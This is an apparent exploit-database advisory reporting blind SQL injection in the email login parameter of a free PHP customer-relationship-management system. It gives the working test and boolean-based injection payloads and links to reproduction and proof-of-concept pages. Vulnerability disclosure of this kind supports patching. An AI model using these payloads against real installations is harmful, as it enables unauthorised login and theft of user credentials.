Share
## https://sploitus.com/exploit?id=PACKETSTORM:172596
## Title: SCRMS-2023-05-27-1.0-Multiple-SQLi  
## Author: nu11secur1ty  
## Date: 05.27.2023  
## Vendor: https://github.com/oretnom23  
## Software: https://www.sourcecodester.com/php/15895/simple-customer-relationship-management-crm-system-using-php-free-source-coude.html  
## Reference: https://portswigger.net/web-security/sql-injection  
  
## Description:  
The `email` parameter appears to be vulnerable to SQL injection  
attacks. The test payloads 45141002' or 6429=6429-- and 37491017' or  
5206=5213-- were each submitted in the email parameter. These two  
requests resulted in different responses, indicating that the input is  
being incorporated into a SQL query in an unsafe way. The attacker can  
easily steal all users and their passwords for access to the system.  
Even if they are strongly encrypted this will get some time, but this  
is not a problem for an attacker to decrypt if, if they are not enough  
strongly encrypted.  
  
STATUS: HIGH Vulnerability  
  
[+]Payload:  
```mysql  
---  
Parameter: email (POST)  
Type: boolean-based blind  
Title: OR boolean-based blind - WHERE or HAVING clause  
Payload: email=-1544' OR 2326=2326-- eglC&password=c5K!k0k!T7&login=  
---  
  
```  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/SCRMS-2023-05-27-1.0)  
  
## Proof and Exploit:  
[href](https://www.nu11secur1ty.com/2023/05/scrms-2023-05-27-10-multiple-sqli.html)  
  
## Time spend:  
01:00:00